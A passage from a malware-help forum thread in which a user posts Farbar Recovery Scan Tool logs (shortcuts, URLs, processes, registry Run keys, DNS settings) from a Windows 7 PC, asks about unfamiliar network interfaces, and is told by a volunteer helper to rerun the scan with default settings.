ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN\VLC media player - reset preferences and cache files.lnk -> F:\Programs\VLC\vlc.exe (VideoLAN) -> --reset-config --reset-plugins-cache vlc://quit
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN\VLC media player skinned.lnk -> F:\Programs\VLC\vlc.exe (VideoLAN) -> -Iskins
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Screaming Bee\MorphVOX Pro\Uninstall MorphVOX Pro.lnk -> C:\Windows\SysWOW64\msiexec.exe (Microsoft Corporation) -> /x{76828C87-C612-4329-843B-4DB58060030A}
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScpToolkit\ScpToolkit Updater.lnk -> C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe (Nefarius Software Solutions) -> /checknow
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Peace\Setup - Back up.lnk -> C:\Program Files\EqualizerAPO\config\PeaceSetup.exe () -> 3
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Peace\Setup - Basic Settings.lnk -> C:\Program Files\EqualizerAPO\config\PeaceSetup.exe () -> 5
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Peace\Setup - Get Help.lnk -> C:\Program Files\EqualizerAPO\config\PeaceSetup.exe () -> 6
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Peace\Setup - Install.lnk -> C:\Program Files\EqualizerAPO\config\PeaceSetup.exe () -> 1
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Peace\Setup - Restore.lnk -> C:\Program Files\EqualizerAPO\config\PeaceSetup.exe () -> 4
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Peace\Setup - Uninstall.lnk -> C:\Program Files\EqualizerAPO\config\PeaceSetup.exe () -> 2
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ozone Neon 3K Driver\Ozone Neon 3K Driver.lnk -> C:\Program Files (x86)\Ozone Neon 3K Driver\OzoneMonitor.exe (Ozone) -> 1
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\3D Vision\3D Vision preview pack 1.lnk -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvstlink.exe (NVIDIA Corporation) -> /show
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\3D Vision\Disable 3D Vision.lnk -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvstlink.exe (NVIDIA Corporation) -> /disable
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\3D Vision\Enable 3D Vision.lnk -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvstlink.exe (NVIDIA Corporation) -> /enable
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nexus Mod Manager\Nexus Mod Manager (Trace Mode).lnk -> C:\Program Files\Nexus Mod Manager\NexusClient.exe (Black Tree Gaming) -> -trace
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories\Check For Updates.lnk -> C:\Program Files\Microsoft Xbox 360 Accessories\AUSetting.exe (Microsoft Corporation) -> -forcecheck
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Backup and Restore Center.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.BackupAndRestore
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\DirectVobSub.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> "C:\Program Files (x86)\K-Lite Codec Pack\Filters\DirectVobSub64\vsfilter.dll",DirectVobSub
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\ffdshow audio decoder (x64).lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> "C:\Program Files (x86)\K-Lite Codec Pack\Filters\ffdshow64\ffdshow.ax",configureAudio
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\ffdshow audio decoder.lnk -> C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) -> "C:\Program Files (x86)\K-Lite Codec Pack\Filters\ffdshow\ffdshow.ax",configureAudio
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\ffdshow VFW interface (x64).lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> "C:\Windows\system32\ff_vfw.dll",configureVFW
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\ffdshow VFW interface.lnk -> C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) -> "C:\Windows\SysWOW64\ff_vfw.dll",configureVFW
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\ffdshow video decoder (x64).lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> "C:\Program Files (x86)\K-Lite Codec Pack\Filters\ffdshow64\ffdshow.ax",configure
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\ffdshow video decoder.lnk -> C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) -> "C:\Program Files (x86)\K-Lite Codec Pack\Filters\ffdshow\ffdshow.ax",configure
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Audio.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> "C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV64\lavaudio.ax",OpenConfiguration
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Splitter.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> "C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV64\lavsplitter.ax",OpenConfiguration
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Video.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> "C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV64\lavvideo.ax",OpenConfiguration
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\madVR.lnk -> C:\Program Files (x86)\K-Lite Codec Pack\Filters\madVR\madHcCtrl.exe (madshi.net) -> editLocalSettingsDontWait
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\x264 VFW (x64).lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> "C:\Windows\system32\x264vfw64.dll",Configure
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\x264 VFW (x86).lnk -> C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) -> "C:\Windows\SysWOW64\x264vfw.dll",Configure
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\Xvid VFW.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> "C:\Windows\system32\xvidvfw.dll",Configure
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\About Java.lnk -> C:\Program Files\Java\jre1.8.0_144\bin\javacpl.exe (Oracle Corporation) -> -tab about
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Check For Updates.lnk -> C:\Program Files\Java\jre1.8.0_144\bin\javacpl.exe (Oracle Corporation) -> -tab update
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP\HP Deskjet 3520 series\HP Deskjet 3520 series.lnk -> C:\Program Files\HP\HP Deskjet 3520 series\Bin\HP Deskjet 3520 series.exe (Hewlett-Packard Co.) -> -Start UDCDevicePage
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP\HP Deskjet 3520 series\HP Product Improvement Study.lnk -> C:\Program Files\HP\HP Deskjet 3520 series\Bin\HPCustPartic.exe (Hewlett-Packard Co.) -> /changesettings /UA 11.0 /DDV 0x0a00
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP\HP Deskjet 3520 series\HP Setup Guide.lnk -> C:\Program Files\HP\HP Deskjet 3520 series\Bin\HWSetup.exe (Hewlett-Packard Co.) -> /flow standalone
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP\HP Deskjet 3520 series\Uninstall.lnk -> C:\Windows\SysWOW64\msiexec.exe (Microsoft Corporation) -> /qb /x {A0A03B53-927D-4454-A456-CB0A72A4912F}
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP\HP Deskjet 3520 series\Update IP Address.lnk -> C:\Program Files\HP\HP Deskjet 3520 series\Bin\DeviceSetup.exe (Hewlett-Packard Co.) -> /changeip ""
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hi-Rez Studios\Uninstall All Hi-Rez Games.lnk -> C:\Program Files (x86)\Hi-Rez Studios\HiRezGamesDiagAndSupport.exe (Hewlett-Packard Company) -> uninstall=all
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gyazo\Gyazo Settings.lnk -> C:\Program Files (x86)\Gyazo\GyStation.exe (Nota Inc.) -> /option
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET\ESET NOD32 Antivirus\Uninstall.lnk -> C:\Program Files\ESET\ESET NOD32 Antivirus\callmsi.exe (ESET) -> /i {FC6250CE-D271-4A2E-AFCC-59D2BFA29795}
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.7\main.lua.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation) -> F:\Program Files (x86)\Cheat Engine 6.7\main.lua
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk -> C:\Windows\System32\compmgmt.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk -> C:\Windows\System32\eventvwr.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk -> C:\Windows\System32\perfmon.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk -> C:\Windows\System32\secpol.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk -> C:\Windows\System32\taskschd.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell Modules.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation) -> -NoExit -ImportSystemModules
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk -> C:\Windows\System32\mblctr.exe (Microsoft Corporation) -> /open
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> %SystemRoot%\system32\OobeFldr.dll,ShowWelcomeCenter LaunchedBy_StartMenuShortcut
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Resource Monitor.lnk -> C:\Windows\System32\perfmon.exe (Microsoft Corporation) -> /res
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Task Scheduler.lnk -> C:\Windows\System32\taskschd.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Speech Recognition.lnk -> C:\Windows\Speech\Common\sapisvr.exe (Microsoft Corporation) -> -SpeechUX
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.EaseOfAccessCenter
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation) -> /SendTo
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\TeamViewer.lnk -> C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH) -> --sendto
ShortcutWithArgument: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\Tools\Open Import Folder.lnk -> C:\Windows\AppCompat\Programs\tk\Binaries\TK17_ShellRun.exe () -> "%IMPORT_PATH%"
ShortcutWithArgument: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\Special Modes\No Models.lnk -> C:\Windows\AppCompat\Programs\tk\Binaries\TK17_Launcher.exe () -> /nomodels
ShortcutWithArgument: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\Special Modes\No Tags.lnk -> C:\Windows\AppCompat\Programs\tk\Binaries\TK17_Launcher.exe () -> /notags
ShortcutWithArgument: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\Special Modes\No Textures+Models+Tags.lnk -> C:\Windows\AppCompat\Programs\tk\Binaries\TK17_Launcher.exe () -> /notextures /nomodels /notags
ShortcutWithArgument: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\Special Modes\No Textures+Models.lnk -> C:\Windows\AppCompat\Programs\tk\Binaries\TK17_Launcher.exe () -> /notextures /nomodels
ShortcutWithArgument: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\Special Modes\No Textures+Tags.lnk -> C:\Windows\AppCompat\Programs\tk\Binaries\TK17_Launcher.exe () -> /notextures /notags
ShortcutWithArgument: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\Special Modes\No Textures.lnk -> C:\Windows\AppCompat\Programs\tk\Binaries\TK17_Launcher.exe () -> /notextures
ShortcutWithArgument: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc\Discord.lnk -> C:\Users\Sblck\AppData\Local\Discord\Update.exe (GitHub) -> --processStart Discord.exe
ShortcutWithArgument: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) ->  -extoff
ShortcutWithArgument: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.EaseOfAccessCenter
ShortcutWithArgument: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation) -> /SendTo
ShortcutWithArgument: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\SendTo\TeamViewer.lnk -> C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH) -> --sendto
ShortcutWithArgument: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Discord.lnk -> C:\Users\Sblck\AppData\Local\Discord\Update.exe (GitHub) -> --processStart Discord.exe
ShortcutWithArgument: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Media Player.lnk -> C:\Program Files (x86)\Windows Media Player\wmplayer.exe (Microsoft Corporation) -> /prefetch:1
ShortcutWithArgument: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Discord.lnk -> C:\Users\Sblck\AppData\Local\Discord\Update.exe (GitHub) -> --processStart Discord.exe


InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Yet Another (remote) Process Monitor\Yet Another (remote) Process Monitor on the Web.url -> URL: hxxp://yaprocmon.sourceforge.net/
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tunngle\Tunngle on the Web.url -> URL: hxxp://www.Tunngle.net/
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam\Steam Support Center.url -> URL: hxxp://support.steampowered.com/
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Help\Online Codec Help.url -> URL: hxxp://www.codecguide.com/help.htm
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Get Help.url -> URL: hxxp://java.com/help
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.url -> URL: hxxp://java.com/
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOG.com\Planetbase\Documents\Support.url -> URL: hxxp://www.gog.com/support/planetbase
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Geeks3D\Benchmarks\FurMark\FurMark online scores and ranking.url -> URL: hxxp://ozone3d.net/redirect.php?id=217
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Geeks3D\Benchmarks\FurMark\Geeks3D.com.url -> URL: hxxp://www.geeks3d.com/category/geeks3d/furmark-geeks3d/
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Geeks3D\Benchmarks\FurMark\Homepage.url -> URL: hxxp://www.ozone3d.net/benchmarks/fur/
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Geeks3D\Benchmarks\FurMark\Scores comparative tables.url -> URL: hxxp://ozone3d.net/redirect.php?id=222
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Geeks3D\Benchmarks\FurMark\SLI and CrossFire support.url -> URL: hxxp://ozone3d.net/redirect.php?id=211
InternetURL: C:\Users\Sblck\Favorites\Links\Suggested Sites (2).url -> URL: hxxps://ieonline.microsoft.com/#ieslice
InternetURL: C:\Users\Sblck\Favorites\Links\Suggested Sites (3).url -> URL: hxxps://ieonline.microsoft.com/#ieslice
InternetURL: C:\Users\Sblck\Favorites\Links\Suggested Sites.url -> 
InternetURL: C:\Users\Sblck\Favorites\Links\Web Slice Gallery.url -> URL: hxxp://go.microsoft.com/fwlink/?LinkId=121315
InternetURL: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\DARK SOULS Prepare To Die Edition.url -> URL: steam://rungameid/211420
InternetURL: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Dead Space 2.url -> URL: steam://rungameid/47780
InternetURL: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Dead Space.url -> URL: steam://rungameid/17470
InternetURL: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Deus Ex Game of the Year Edition.url -> URL: steam://rungameid/6910
InternetURL: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Deus Ex Human Revolution - Director's Cut.url -> URL: steam://rungameid/238010
InternetURL: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\DOOM.url -> URL: steam://rungameid/379720
InternetURL: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Just Survive.url -> URL: steam://rungameid/295110
InternetURL: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Metro 2033 Redux.url -> URL: steam://rungameid/286690
InternetURL: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Metro Last Light Redux.url -> URL: steam://rungameid/287390
InternetURL: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Neverwinter.url -> URL: steam://rungameid/109600
InternetURL: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Wallpaper Engine.url -> URL: steam://rungameid/431960

==================== End of Shortcut.txt =============================



#7 xterz

xterz
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:03:06 AM

Posted 28 December 2017 - 11:36 AM

Im gonna add that i do saw some logons and  permission changes in Event viewer ( appeared to be so) also NT Authority were mentioned in others.

  • Can i ask you to help me identify this interfaces/ rules mentioned in FRST.txt ? 
==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{86CDD8DF-610B-458D-8F52-08486E90ABC2}: [NameServer] 8.8.8.8,8.8.4.4 <- Google Dns
Tcpip\..\Interfaces\{86CDD8DF-610B-458D-8F52-08486E90ABC2}: [DhcpNameServer] 192.168.1.254 < - Local if im correct
Tcpip\..\Interfaces\{A97F8278-8DA8-49C6-A814-8E256C06EA09}: [DhcpNameServer] 7.254.254.254  <- This is possible Tunngle
Tcpip\..\Interfaces\{D9308FC8-B464-42EA-B45C-C471171FC41B}: [DhcpNameServer] 192.168.42.129 
Tcpip\..\Interfaces\{F3D3A03E-51F4-4ABA-8071-D4DF9EAF1825}: [DhcpNameServer] 185.156.172.178 185.93.180.131 83.143.245.42 

One of these last  two can be CyberghostVPN  ( the ones that dont have comment) the other i have no idea.



Edited by xterz, 28 December 2017 - 11:38 AM.


#8 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,416 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:06 PM

Posted 28 December 2017 - 03:08 PM

Greetings.

Please follow the instructions as I have posted them. Rerun a FRST scan leaving the default settings and copy/paste the reports in your reply. No need to use code boxes as it makes it more difficult to deal with.


Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"May you be richly rewarded by the Lord, the God of Israel, under whose wings you have come to take refuge."

#9 xterz

xterz
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:03:06 AM

Posted 28 December 2017 - 03:40 PM

Those are the FRST results , the only thing i added were the extra options and shortcuts , but sure will do .


Edited by xterz, 28 December 2017 - 03:41 PM.


#10 xterz

xterz
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:03:06 AM

Posted 28 December 2017 - 03:46 PM

There you go , the new updated results

FRST.txt 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 26-12-2017
Ran by Sblck (administrator) on SBLCK-PC (28-12-2017 20:43:33)
Running from F:\Desktop\DesktopC
Loaded Profiles: Sblck (Available Profiles: Sblck)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Scarlet.Crush Productions) C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
() C:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe
() D:\Programs\Core Temp\Core Temp.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
() F:\Games\SteamLibrary\steamapps\common\wallpaper_engine\wallpaper64.exe
(Scarlet.Crush Productions) C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpTrayApp.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
() C:\Program Files (x86)\RivaTuner Statistics Server\RTSS.exe
() C:\Program Files (x86)\RivaTuner Statistics Server\EncoderServer.exe
() C:\Program Files (x86)\RivaTuner Statistics Server\RTSSHooksLoader64.exe
(Samsung Electronics Co. Ltd.) C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
() F:\Program Files (x86)\SpeedFan\speedfan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Microsoft Corporation) C:\Windows\System32\StikyNot.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9197568 2017-01-11] (Realtek Semiconductor)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284440 2011-04-29] (Intel Corporation)
HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3111712 2017-12-15] (Valve Corporation)
HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\Run: [WinAuth] => F:\WinAuth-3.5.1\WinAuth.exe [5781576 2016-06-07] ()
HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\Run: [Gaijin.Net Agent] => "C:\Users\Sblck\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe"
HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\Run: [WallpaperEngine] => F:\Games\SteamLibrary\steamapps\common\wallpaper_engine\wallpaper64.exe [1766376 2017-11-23] ()
HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\system32\StikyNot.exe [427520 2009-07-14] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScpToolkit Tray Notifications.lnk [2016-10-08]
ShortcutTarget: ScpToolkit Tray Notifications.lnk -> C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpTrayApp.exe (Scarlet.Crush Productions)
GroupPolicy: Restriction <==== ATTENTION
GroupPolicy\User: Restriction <==== ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{86CDD8DF-610B-458D-8F52-08486E90ABC2}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{86CDD8DF-610B-458D-8F52-08486E90ABC2}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{A97F8278-8DA8-49C6-A814-8E256C06EA09}: [DhcpNameServer] 7.254.254.254
Tcpip\..\Interfaces\{D9308FC8-B464-42EA-B45C-C471171FC41B}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{F3D3A03E-51F4-4ABA-8071-D4DF9EAF1825}: [DhcpNameServer] 185.156.172.178 185.93.180.131 83.143.245.42
 
Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-2661263523-112610016-3866790350-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_144\bin\ssv.dll [2017-08-14] (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-14] (Oracle Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\ssv.dll [2017-08-14] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-14] (Oracle Corporation)
 
FireFox:
========
